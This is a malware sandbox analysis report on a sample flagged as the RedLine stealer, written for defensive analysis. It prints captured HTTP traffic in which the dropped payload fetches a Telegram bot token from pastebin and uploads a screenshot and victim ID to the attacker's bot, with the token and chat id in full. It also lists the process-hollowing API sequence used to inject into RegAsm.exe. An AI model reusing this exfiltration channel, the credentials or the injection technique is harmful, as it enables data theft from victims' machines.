                                                    2024-09-08 12:56:45 UTC16384INData Raw: 1c 00 75 00 3d 00 16 00 70 00 44 00 0e 00 0a 00 2d 00 5f 00 6b 00 17 00 01 00 09 00 3e 00 00 00 04 00 36 00 16 00 16 00 05 00 3b 00 2d 00 52 00 0b 00 29 00 07 00 46 00 00 00 56 00 1a 00 0c 00 24 00 21 00 36 00 49 00 09 00 06 00 75 00 56 00 09 00 3c 00 66 00 0f 00 77 00 22 00 2a 00 18 00 45 00 0c 00 36 00 1b 00 0d 00 26 00 04 00 72 00 13 00 25 00 21 00 22 00 2d 00 05 00 16 00 1e 00 0c 00 14 00 2b 00 39 00 06 00 38 00 38 00 68 00 29 00 05 00 3b 00 14 00 07 00 05 00 33 00 5a 00 44 00 33 00 2b 00 36 00 25 00 0c 00 2e 00 4c 00 1b 00 26 00 28 00 45 00 02 00 09 00 3c 00 58 00 4f 00 3b 00 20 00 4b 00 1a 00 11 00 07 00 53 00 01 00 22 00 2a 00 1a 00 21 00 01 00 18 00 59 00 0c 00 3e 00 56 00 4f 00 30 00 4d 00 7a 00 49 00 35 00 5d 00 31 00 45 00 70 00 0c 00 20 00 31
                                                    Data Ascii: u=pD-_k>6;-R)FV$!6IuV<fw"*E6&r%!"-+988h);3ZD3+6%.L&(E<XO; KS"*!Y>VO0MzI5]1Ep 1
                                                    2024-09-08 12:56:45 UTC16384INData Raw: 0a 00 73 00 50 00 21 00 27 00 2d 00 1a 00 0d 00 28 00 0b 00 3b 00 46 00 14 00 54 00 2c 00 23 00 43 00 09 00 08 00 09 00 08 00 4c 00 21 00 5c 00 06 00 09 00 0b 00 1c 00 0d 00 1b 00 22 00 18 00 4e 00 7a 00 17 00 04 00 72 00 38 00 74 00 52 00 1f 00 3f 00 07 00 4a 00 73 00 51 00 09 00 27 00 4e 00 04 00 0d 00 35 00 29 00 26 00 1e 00 77 00 1a 00 06 00 6b 00 20 00 37 00 32 00 2e 00 52 00 06 00 77 00 2a 00 13 00 7b 00 18 00 30 00 08 00 69 00 19 00 17 00 25 00 28 00 37 00 7d 00 2e 00 20 00 29 00 0d 00 4e 00 12 00 24 00 15 00 63 00 32 00 3f 00 28 00 29 00 27 00 33 00 76 00 1f 00 20 00 20 00 00 00 2b 00 13 00 27 00 39 00 5b 00 36 00 12 00 63 00 44 00 37 00 29 00 25 00 0f 00 45 00 23 00 31 00 1a 00 12 00 11 00 24 00 50 00 65 00 14 00 04 00 06 00 12 00 05 00 17 00 3d
                                                    Data Ascii: sP!'-(;FT,#CL!\"Nzr8tR?JsQ'N5)&wk 72.Rw*{0i%(7}. )N$c2?()'3v +'9[6cD7)%E#1$Pe=
                                                    2024-09-08 12:56:45 UTC16384INData Raw: 3d 00 3b 00 1f 00 4c 00 76 00 03 00 74 00 57 00 2b 00 26 00 39 00 1a 00 36 00 10 00 19 00 23 00 0a 00 73 00 2d 00 49 00 1a 00 03 00 25 00 4a 00 37 00 01 00 3b 00 2b 00 37 00 2e 00 25 00 2f 00 19 00 26 00 2a 00 1d 00 06 00 03 00 79 00 52 00 34 00 0a 00 07 00 3b 00 36 00 36 00 7a 00 31 00 04 00 07 00 31 00 04 00 72 00 25 00 02 00 54 00 15 00 14 00 23 00 1d 00 32 00 52 00 29 00 09 00 21 00 34 00 01 00 3d 00 72 00 0d 00 01 00 60 00 33 00 1b 00 60 00 36 00 14 00 55 00 1f 00 06 00 25 00 26 00 13 00 3e 00 75 00 1f 00 30 00 08 00 1f 00 2c 00 38 00 36 00 0c 00 56 00 37 00 05 00 37 00 71 00 2b 00 4b 00 13 00 1e 00 23 00 61 00 60 00 25 00 2b 00 3b 00 1e 00 2b 00 0e 00 13 00 06 00 33 00 04 00 22 00 77 00 1c 00 2b 00 58 00 66 00 12 00 63 00 35 00 27 00 25 00 07 00 5e
                                                    Data Ascii: =;LvtW+&96#s-I%J7;+7.%/&*yR4;66z11r%T#2R)!4=r`3`6U%&>u0,86V77q+K#a`%+;+3"w+Xfc5'%^


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.749709104.20.4.2354433672C:\Users\user\AppData\Local\Temp\filename.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-08 12:56:51 UTC74OUTGET /raw/EgQVHrqH HTTP/1.1
                                                    Host: pastebin.com
                                                    Connection: Keep-Alive
                                                    2024-09-08 12:56:52 UTC391INHTTP/1.1 200 OK
                                                    Date: Sun, 08 Sep 2024 12:56:52 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1;mode=block
                                                    cache-control: public, max-age=1801
                                                    CF-Cache-Status: EXPIRED
                                                    Last-Modified: Sun, 08 Sep 2024 12:56:52 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 8bff19db2e578c47-EWR
                                                    2024-09-08 12:56:52 UTC52INData Raw: 32 65 0d 0a 37 35 31 39 33 32 31 37 34 36 3a 41 41 47 59 41 5a 64 6b 48 54 71 45 34 4c 76 55 63 35 66 44 4e 51 47 69 49 52 76 66 6d 7a 4e 4d 4c 7a 6b 0d 0a
                                                    Data Ascii: 2e7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk
                                                    2024-09-08 12:56:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.749710149.154.167.2204433672C:\Users\user\AppData\Local\Temp\filename.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-08 12:56:52 UTC259OUTPOST /bot7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk/sendDocument HTTP/1.1
                                                    Content-Type: multipart/form-data; boundary="7e3a2533-b8ae-42ab-9b1f-c8a90fd05a6f"
                                                    Host: api.telegram.org
                                                    Content-Length: 708232
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    2024-09-08 12:56:53 UTC25INHTTP/1.1 100 Continue
                                                    2024-09-08 12:56:53 UTC40OUTData Raw: 2d 2d 37 65 33 61 32 35 33 33 2d 62 38 61 65 2d 34 32 61 62 2d 39 62 31 66 2d 63 38 61 39 30 66 64 30 35 61 36 66 0d 0a
                                                    Data Ascii: --7e3a2533-b8ae-42ab-9b1f-c8a90fd05a6f
                                                    2024-09-08 12:56:53 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                    Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                    2024-09-08 12:56:53 UTC10OUTData Raw: 35 31 33 33 31 38 37 33 37 30
                                                    Data Ascii: 5133187370
                                                    2024-09-08 12:56:53 UTC134OUTData Raw: 0d 0a 2d 2d 37 65 33 61 32 35 33 33 2d 62 38 61 65 2d 34 32 61 62 2d 39 62 31 66 2d 63 38 61 39 30 66 64 30 35 61 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 61 72 73 65 5f 6d 6f 64 65 0d 0a 0d 0a
                                                    Data Ascii: --7e3a2533-b8ae-42ab-9b1f-c8a90fd05a6fContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=parse_mode
                                                    2024-09-08 12:56:53 UTC4OUTData Raw: 48 54 4d 4c
                                                    Data Ascii: HTML
                                                    2024-09-08 12:56:53 UTC131OUTData Raw: 0d 0a 2d 2d 37 65 33 61 32 35 33 33 2d 62 38 61 65 2d 34 32 61 62 2d 39 62 31 66 2d 63 38 61 39 30 66 64 30 35 61 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                    Data Ascii: --7e3a2533-b8ae-42ab-9b1f-c8a90fd05a6fContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                    2024-09-08 12:56:53 UTC47OUTData Raw: 31 2e 30 2e 30 20 4f 6e 6c 69 6e 65 20 20 3c 63 6f 64 65 3e 32 31 34 37 38 38 39 44 35 30 40 66 72 6f 6e 74 64 65 73 6b 3c 2f 63 6f 64 65 3e
                                                    Data Ascii: 1.0.0 Online <code>2147889D50@user</code>
                                                    2024-09-08 12:56:53 UTC141OUTData Raw: 0d 0a 2d 2d 37 65 33 61 32 35 33 33 2d 62 38 61 65 2d 34 32 61 62 2d 39 62 31 66 2d 63 38 61 39 30 66 64 30 35 61 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 53 63 72 65 65 6e 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 53 63 72 65 65 6e 2e 70 6e 67 0d 0a 0d 0a
                                                    Data Ascii: --7e3a2533-b8ae-42ab-9b1f-c8a90fd05a6fContent-Disposition: form-data; name=document; filename=Screen.png; filename*=utf-8''Screen.png
                                                    2024-09-08 12:56:53 UTC16355OUTData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec fd 07 b4 5d d5 95 e7 0b 9f 73 af 32 d5 a3 dd a3 ba c7 ab d7 5f 57 b9 fa bd ef 2b 57 77 bf ae d8 fd de 6b 2a db 18 13 95 c8 20 44 32 32 c6 36 8e 65 c0 36 0e e4 8c 30 39 89 9c 8d ab c0 36 06 93 41 42 12 12 88 9c 04 08 11 84 02 08 89 6c 63 7b 7d eb b7 f6 fe ef 3b cf ba f3 a4 7b cf 55 c0 57 63 fc c6 5a 6b ae b9 d6 de e7 5c a9 cc fd d5 5c 7b d7 6a 17 bf 1d 7a cb fa 26 ac 6b 42 9c 9b 13 5b 51 e5 c7 bd e6 bc d5 96 fa 45 23 43 ed c2 78 0f a3 0c 99 fa 05 9d 53 3b 3f fe dc e1 bc 37 1b 51
                                                    Data Ascii: PNGIHDRCsRGBgAMAapHYsodIDATx^]s2_W+Wwk* D226e6096ABlc{};{UWcZk\\{jz&kB[QE#CxS;?7Q
                                                    2024-09-08 12:56:53 UTC16355OUTData Raw: 58 79 71 f8 cd ba 79 0d 72 45 cc 9b 7b 5f 58 bd e2 d9 e0 09 3e 5e 34 f0 fa eb af 87 d7 57 3c 1a de 7f 6f e0 c8 b0 d8 54 04 a0 87 27 ef 7a 81 f7 1d 76 c3 a8 00 ec 9c cd 49 00 5e 7c f1 c5 e1 d7 bf f9 8d a9 f4 2b 04 e0 c0 d8 3f fa db 6d f5 5f 12 80 a5 fc ab 04 e0 69 a7 b9 62 af 53 3c e9 67 f1 24 de 70 f0 24 5f 2b 3c a9 d7 0d 9e f4 b3 78 d2 cf e2 49 3f 8b 27 fb 5a e1 c9 bd 4e d8 58 02 50 78 72 af 13 3c f9 07 bf 2b 02 50 e3 51 01 e8 f3 bb 2e 00 bd 63 c1 96 3a 52 af 05 92 7f 22 17 80 9e f4 b3 8c 71 64 9f c5 13 7f 16 55 02 36 23 17 7d a2 59 5c 73 76 dc 4e 00 7a f4 7d fe d1 06 9a cd 37 13 81 36 6e 05 a0 24 a0 fa 9e e8 6b 27 01 1b e6 3f bb a4 12 7f 56 02 d2 aa 1a 90 b7 02 57 2f e5 28 2b 02 45 a7 12 d0 8a 3d 64 9f 84 a2 44 20 f1 5c 2a d2 b7 cf 00 94 04 ac ef fd 40
                                                    Data Ascii: XyqyrE{_X>^4W<oT'zvI^|+?m_ibS<g$p$_+<xI?'ZNXPxr<+PQ.c:R"qdU6#}Y\svNz}76n$k'?VW/(+E=dD \*@
                                                    2024-09-08 12:56:54 UTC1289INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Sun, 08 Sep 2024 12:56:54 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 901
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    {"ok":true,"result":{"message_id":7845,"from":{"id":7519321746,"is_bot":true,"first_name":"Gondon","username":"gondobobot"},"chat":{"id":5133187370,"first_name":"DEXIQUE","username":"dexique","type":"private"},"date":1725800214,"document":{"file_name":"Screen.png","mime_type":"image/png","thumbnail":{"file_id":"AAMCAgADGQMAAh6lZt2fFgtMvwWKsJTrbmceEve-FfIAAjNRAAK5CPBKlTejVRYoOh8BAAdtAAM2BA","file_unique_id":"AQADM1EAArkI8Epy","file_size":13928,"width":320,"height":256},"thumb":{"file_id":"AAMCAgADGQMAAh6lZt2fFgtMvwWKsJTrbmceEve-FfIAAjNRAAK5CPBKlTejVRYoOh8BAAdtAAM2BA","file_unique_id":"AQADM1EAArkI8Epy","file_size":13928,"width":320,"height":256},"file_id":"BQACAgIAAxkDAAIepWbdnxYLTL8FirCU625nHhL3vhXyAAIzUQACuQjwSpU3o1UWKDofNgQ","file_unique_id":"AgADM1EAArkI8Eo","file_size":707592},"caption":"1.0.0 Online 2147889D50@user","caption_entities":[{"offset":14,"length":20,"type":"code"}]}}


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:08:56:04
                                                    Start date:08/09/2024
                                                    Path:C:\Users\user\Desktop\66dcad8f5f33a_crypted.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\66dcad8f5f33a_crypted.exe"
                                                    Imagebase:0xac0000
                                                    File size:320'512 bytes
                                                    MD5 hash:B8010780CBCCBA9EC2E20D7B3C17C6BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1477865176.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:08:56:04
                                                    Start date:08/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:09:57:14
                                                    Start date:08/09/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    Imagebase:0xbd0000
                                                    File size:65'440 bytes
                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.1659124190.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:09:57:32
                                                    Start date:08/09/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\filename.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\filename.exe"
                                                    Imagebase:0xde0000
                                                    File size:436'224 bytes
                                                    MD5 hash:556A8B2AFEF96F81ACDE6CA1A525650E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:09:58:27
                                                    Start date:08/09/2024
                                                    Path:C:\ProgramData\Path\Path.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Path\Path.exe"
                                                    Imagebase:0xd20000
                                                    File size:768'436'224 bytes
                                                    MD5 hash:7106B8DDE9093C302EB124DDBB6E4C81
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:09:58:27
                                                    Start date:08/09/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5445.tmp.cmd""
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:09:58:27
                                                    Start date:08/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:09:58:27
                                                    Start date:08/09/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 6
                                                    Imagebase:0xd10000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:44.1%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:21.4%
                                                      Total number of Nodes:28
                                                      Total number of Limit Nodes:1
                                                      execution_graph 278 2ce0988 279 2ce09a5 278->279 286 2ce0b28 279->286 280 2ce09bd 285 2ce0b28 VirtualProtectEx 280->285 281 2ce09d5 283 2ce09fe 281->283 291 2ce04b0 281->291 285->281 289 2ce0b49 286->289 287 2ce0deb VirtualProtectEx 288 2ce0e2b 287->288 288->280 289->287 290 2ce0d7e 289->290 290->280 292 2ce0da0 VirtualProtectEx 291->292 294 2ce0e2b 292->294 294->283 295 2e224c5 298 2e224fd CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 295->298 297 2e226da WriteProcessMemory 299 2e2271f 297->299 298->297 300 2e22761 WriteProcessMemory Wow64SetThreadContext ResumeThread 299->300 301 2e22724 WriteProcessMemory 299->301 301->299 302 2ce0979 303 2ce09a5 302->303 308 2ce0b28 VirtualProtectEx 303->308 304 2ce09bd 309 2ce0b28 VirtualProtectEx 304->309 305 2ce09d5 306 2ce04b0 VirtualProtectEx 305->306 307 2ce09fe 305->307 306->307 308->304 309->305

                                                      Callgraph

                                                      Executed Functions

                                                      Function 02E224C5 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E22437,02E22427), ref: 02E22634
                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02E22647
                                                      • Wow64GetThreadContext.KERNEL32(000002E8,00000000), ref: 02E22665
                                                      • ReadProcessMemory.KERNELBASE(00000300,?,02E2247B,00000004,00000000), ref: 02E22689
                                                      • VirtualAllocEx.KERNELBASE(00000300,?,?,00003000,00000040), ref: 02E226B4
                                                      • WriteProcessMemory.KERNELBASE(00000300,00000000,?,?,00000000,?), ref: 02E2270C
                                                      • WriteProcessMemory.KERNELBASE(00000300,00400000,?,?,00000000,?,00000028), ref: 02E22757
                                                      • WriteProcessMemory.KERNELBASE(00000300,02CFFF90,?,00000004,00000000), ref: 02E22795
                                                      • Wow64SetThreadContext.KERNEL32(000002E8,02D00000), ref: 02E227D1
                                                      • ResumeThread.KERNELBASE(000002E8), ref: 02E227E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1477826438.0000000002E22000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E22000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2e22000_66dcad8f5f33a_crypted.jbxd
                                                      Similarity
                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                      • API String ID: 2687962208-1257834847
                                                      • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                      • Instruction ID: 4eff75de8b63edb602587906b953d4b5af76ad28c6fca4a0c61e86843e424cd4
                                                      • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                      • Instruction Fuzzy Hash: 6AB1E57664028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB351D774FA41CB94
                                                      Function 02CE0B28 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 23 2ce0b28-2ce0b6c 27 2ce0b6e-2ce0b7c 23->27 29 2ce0d88-2ce0e29 VirtualProtectEx 27->29 30 2ce0b82-2ce0ba2 27->30 38 2ce0e2b 29->38 39 2ce0e30-2ce0e44 29->39 30->29 31 2ce0ba8-2ce0bb3 30->31 31->29 32 2ce0bb9-2ce0bc4 31->32 32->27 34 2ce0bc6-2ce0bcb 32->34 35 2ce0bce-2ce0bd3 34->35 35->29 37 2ce0bd9-2ce0be6 35->37 37->29 40 2ce0bec-2ce0bf8 37->40 38->39 41 2ce0bfa-2ce0c00 40->41 42 2ce0c01-2ce0c06 40->42 41->42 42->29 43 2ce0c0c-2ce0c13 42->43 43->29 44 2ce0c19-2ce0c1f 43->44 44->29 45 2ce0c25-2ce0c30 44->45 45->35 46 2ce0c32-2ce0c41 45->46 47 2ce0d7e-2ce0d85 46->47 48 2ce0c47-2ce0c4e 46->48 49 2ce0c58-2ce0c60 48->49 50 2ce0c50-2ce0c57 48->50 49->29 51 2ce0c66-2ce0c72 49->51 50->49 52 2ce0c7b-2ce0c80 51->52 53 2ce0c74-2ce0c7a 51->53 52->29 54 2ce0c86-2ce0c8d 52->54 53->52 54->29 55 2ce0c93-2ce0c99 54->55 55->29 56 2ce0c9f-2ce0cb5 55->56 57 2ce0cbf-2ce0ccd 56->57 58 2ce0cb7-2ce0cbe 56->58 59 2ce0cd4-2ce0cf8 57->59 58->57 61 2ce0cfa-2ce0cff 59->61 62 2ce0d07-2ce0d11 59->62 61->62 62->29 63 2ce0d13-2ce0d1c 62->63 63->29 64 2ce0d1e-2ce0d3d 63->64 65 2ce0d3f-2ce0d44 64->65 66 2ce0d4c-2ce0d56 64->66 65->66 66->29 67 2ce0d58-2ce0d5d 66->67 67->29 68 2ce0d5f-2ce0d78 67->68 68->47 68->48
                                                      APIs
                                                      • VirtualProtectEx.KERNELBASE(?,03E23594,?,?,?), ref: 02CE0E1C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1477754994.0000000002CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2ce0000_66dcad8f5f33a_crypted.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: a20121c485dffa837508ca604130cfa73b5a6c5c9a50bb36fc291f0d85297283
                                                      • Instruction ID: 3ed911f8ead2268ca33db5d444f37c44a5dfc95444a0d33faf5fd08fa9f0e468
                                                      • Opcode Fuzzy Hash: a20121c485dffa837508ca604130cfa73b5a6c5c9a50bb36fc291f0d85297283
                                                      • Instruction Fuzzy Hash: 9FA1AF709002598FCF11DFA8C480AADBBF1BF49314F598569D85ABB256C379ED81CBE0
                                                      Function 02CE04B0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 69 2ce04b0-2ce0e29 VirtualProtectEx 72 2ce0e2b 69->72 73 2ce0e30-2ce0e44 69->73 72->73
                                                      APIs
                                                      • VirtualProtectEx.KERNELBASE(?,03E23594,?,?,?), ref: 02CE0E1C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1477754994.0000000002CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2ce0000_66dcad8f5f33a_crypted.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: e5f0ba0eb7701415fcea9964c4629e560d5ad95c204757b43e6855f6d850b128
                                                      • Instruction ID: ef7805b4f5e4e488960af02c36dc7fa490a407d0dee874cd8f5904869eaf9bf7
                                                      • Opcode Fuzzy Hash: e5f0ba0eb7701415fcea9964c4629e560d5ad95c204757b43e6855f6d850b128
                                                      • Instruction Fuzzy Hash: E321EFB5D0025DAFCB10DF9AD884ADEFBB4FB48310F50812AE918A7250C375A950CFE1

                                                      Execution Graph

                                                      Execution Coverage:9.1%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:151
                                                      Total number of Limit Nodes:10
                                                      execution_graph 54714 2c8d01c 54715 2c8d034 54714->54715 54716 2c8d08e 54715->54716 54722 5541e98 54715->54722 54726 5542c08 54715->54726 54735 5541ef7 54715->54735 54740 5540ad4 54715->54740 54749 5541ea8 54715->54749 54723 5541ea8 54722->54723 54724 5541eef 54723->54724 54725 5540ad4 CallWindowProcW 54723->54725 54724->54716 54725->54724 54727 5542c18 54726->54727 54728 5542c79 54727->54728 54730 5542c69 54727->54730 54769 5540bfc 54728->54769 54753 5542d90 54730->54753 54758 5542e6c 54730->54758 54764 5542da0 54730->54764 54731 5542c77 54736 5541ee7 54735->54736 54737 5541f02 54735->54737 54738 5540ad4 CallWindowProcW 54736->54738 54737->54716 54739 5541eef 54738->54739 54739->54716 54741 5540adf 54740->54741 54742 5542c79 54741->54742 54744 5542c69 54741->54744 54743 5540bfc CallWindowProcW 54742->54743 54745 5542c77 54743->54745 54746 5542d90 CallWindowProcW 54744->54746 54747 5542da0 CallWindowProcW 54744->54747 54748 5542e6c CallWindowProcW 54744->54748 54746->54745 54747->54745 54748->54745 54750 5541ece 54749->54750 54751 5541eef 54750->54751 54752 5540ad4 CallWindowProcW 54750->54752 54751->54716 54752->54751 54755 5542da0 54753->54755 54754 5542e40 54754->54731 54773 5542e58 54755->54773 54776 5542e48 54755->54776 54759 5542e2a 